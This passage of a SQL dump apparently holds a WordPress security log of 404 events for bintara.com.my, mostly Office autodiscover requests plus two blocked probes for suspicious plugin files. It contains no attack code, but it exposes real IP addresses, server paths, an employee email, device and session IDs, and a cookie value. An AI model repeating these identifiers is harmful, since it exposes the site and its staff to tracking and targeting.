cover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"42.153.149.164\";s:11:\"REMOTE_PORT\";s:4:\"3571\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xaki704GZAhSKnwjBMzRHgAAAAw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571365615.7793\";s:12:\"REQUEST_TIME\";s:10:\"1571365615\";}}','notice','2019-10-18 02:26:59','2019-10-18 02:26:56',35666120,37461696,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'42.153.149.164'),(28261,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"318\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"DEDFEF58-AD69-44D2-AA13-06DB57632EF9\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XakklZmA1jUkTR6fHyRgiwAAAEw\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"42.153.149.164\";s:11:\"REMOTE_PORT\";s:4:\"3407\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XakklZmA1jUkTR6fHyRgiwAAAEw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571366037.6387\";s:12:\"REQUEST_TIME\";s:10:\"1571366037\";}}','notice','2019-10-18 02:34:00','2019-10-18 02:33:58',35271856,37072608,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'42.153.149.164'),(28262,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"316\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"2B04C488-1D93-4BCF-A469-43E942E028FA\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xakl5JmA1jUkTR6fHyRh-gAAAFU\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"203.106.173.27\";s:11:\"REMOTE_PORT\";s:5:\"50059\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xakl5JmA1jUkTR6fHyRh-gAAAFU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571366372.3884\";s:12:\"REQUEST_TIME\";s:10:\"1571366372\";}}','notice','2019-10-18 02:39:37','2019-10-18 02:39:33',35663376,37463472,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'203.106.173.27'),(28263,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"353\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:2:\"en\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{60763293-870F-4275-9756-05494657122D}\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"MacOutlook/16.29.0.190908 (Intelx64 Mac OS X Version 10.14.6 (Build 18G103))\";s:32:\"HTTP_X_AUTODISCOVERARCHIVEASSMTP\";s:4:\"true\";s:23:\"HTTP_X_CLIENTSTATISTICS\";s:93:\"DeviceID=F0686271-88A1-564F-9A8A-8219BFC1DA2C; SessionID=FB0523DB-6218-442E-89B8-198D9D15C060\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:20:\"HTTP_X_USER_IDENTITY\";s:20:\"fatin@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XakvdPI2yqn8iVLYnlTgjwAAAIk\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"123.136.107.86\";s:11:\"REMOTE_PORT\";s:5:\"43524\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XakvdPI2yqn8iVLYnlTgjwAAAIk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571368821.039\";s:12:\"REQUEST_TIME\";s:10:\"1571368821\";}}','notice','2019-10-18 03:20:23','2019-10-18 03:20:21',35274344,37079096,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'123.136.107.86'),(28264,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"353\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:2:\"en\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{8F03FABE-FF7F-4701-8D1B-EB692BE01DE3}\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=0eb6f9b92ef405d903ff396342c5c1e7\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"MacOutlook/16.29.0.190908 (Intelx64 Mac OS X Version 10.14.6 (Build 18G103))\";s:32:\"HTTP_X_AUTODISCOVERARCHIVEASSMTP\";s:4:\"true\";s:23:\"HTTP_X_CLIENTSTATISTICS\";s:93:\"DeviceID=F0686271-88A1-564F-9A8A-8219BFC1DA2C; SessionID=FB0523DB-6218-442E-89B8-198D9D15C060\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:20:\"HTTP_X_USER_IDENTITY\";s:20:\"fatin@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XakwLvmhtecMB5k7bacP3AAAARI\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"118.100.122.157\";s:11:\"REMOTE_PORT\";s:5:\"60955\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XakwLvmhtecMB5k7bacP3AAAARI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571369006.8339\";s:12:\"REQUEST_TIME\";s:10:\"1571369006\";}}','notice','2019-10-18 03:23:29','2019-10-18 03:23:27',35663960,37460840,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'118.100.122.157'),(28265,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"353\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:2:\"en\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{379B540C-048F-4300-851D-7865DC1F6275}\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=0eb6f9b92ef405d903ff396342c5c1e7\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"MacOutlook/16.29.0.190908 (Intelx64 Mac OS X Version 10.14.6 (Build 18G103))\";s:32:\"HTTP_X_AUTODISCOVERARCHIVEASSMTP\";s:4:\"true\";s:23:\"HTTP_X_CLIENTSTATISTICS\";s:93:\"DeviceID=F0686271-88A1-564F-9A8A-8219BFC1DA2C; SessionID=FB0523DB-6218-442E-89B8-198D9D15C060\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:20:\"HTTP_X_USER_IDENTITY\";s:20:\"fatin@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XakwNvmhtecMB5k7bacP3wAAAQg\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"118.100.122.157\";s:11:\"REMOTE_PORT\";s:5:\"60955\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XakwNvmhtecMB5k7bacP3wAAAQg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571369014.1546\";s:12:\"REQUEST_TIME\";s:10:\"1571369014\";}}','notice','2019-10-18 03:23:36','2019-10-18 03:23:34',35271120,37065720,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'118.100.122.157'),(28138,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:52:\"/staging/wp-content/plugins/solid_best_corp/info.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:74:\"https://bintara.com.my/staging/wp-content/plugins/solid_best_corp/info.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:52:\"/staging/wp-content/plugins/solid_best_corp/info.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XacKfz@QAlIeaTAl5H-qaQAAAFY\";s:19:\"REDIRECT_SCRIPT_URI\";s:74:\"https://bintara.com.my/staging/wp-content/plugins/solid_best_corp/info.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:52:\"/staging/wp-content/plugins/solid_best_corp/info.php\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XacKfz@QAlIeaTAl5H-qaQAAAFY\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"188.213.166.219\";s:11:\"REMOTE_PORT\";s:5:\"51297\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:74:\"https://bintara.com.my/staging/wp-content/plugins/solid_best_corp/info.php\";s:10:\"SCRIPT_URL\";s:52:\"/staging/wp-content/plugins/solid_best_corp/info.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XacKfz@QAlIeaTAl5H-qaQAAAFY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571228287.581\";s:12:\"REQUEST_TIME\";s:10:\"1571228287\";}}','notice','2019-10-16 12:18:09','2019-10-16 12:18:07',35053152,36855400,'https://bintara.com.my/staging/wp-content/plugins/solid_best_corp/info.php',1,0,'188.213.166.219'),(28139,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:51:\"/staging/wp-content/plugins/solid_best_corp/sys.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:73:\"https://bintara.com.my/staging/wp-content/plugins/solid_best_corp/sys.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:51:\"/staging/wp-content/plugins/solid_best_corp/sys.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XacKjNwSqwmg3BSzc7-bkwAAAhM\";s:19:\"REDIRECT_SCRIPT_URI\";s:73:\"https://bintara.com.my/staging/wp-content/plugins/solid_best_corp/sys.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:51:\"/staging/wp-content/plugins/solid_best_corp/sys.php\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XacKjNwSqwmg3BSzc7-bkwAAAhM\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"188.213.166.219\";s:11:\"REMOTE_PORT\";s:5:\"52651\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:73:\"https://bintara.com.my/staging/wp-content/plugins/solid_best_corp/sys.php\";s:10:\"SCRIPT_URL\";s:51:\"/staging/wp-content/plugins/solid_best_corp/sys.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XacKjNwSqwmg3BSzc7-bkwAAAhM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571228300.8706\";s:12:\"REQUEST_TIME\";s:10:\"1571228300\";}}','notice','2019-10-16 12:18:22','2019-10-16 12:18:21',35059656,36865112,'https://bintara.com.my/staging/wp-content/plugins/solid_best_corp/sys.php',1,0,'188.213.166.219'),(28140,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"316\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:70:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.4639; 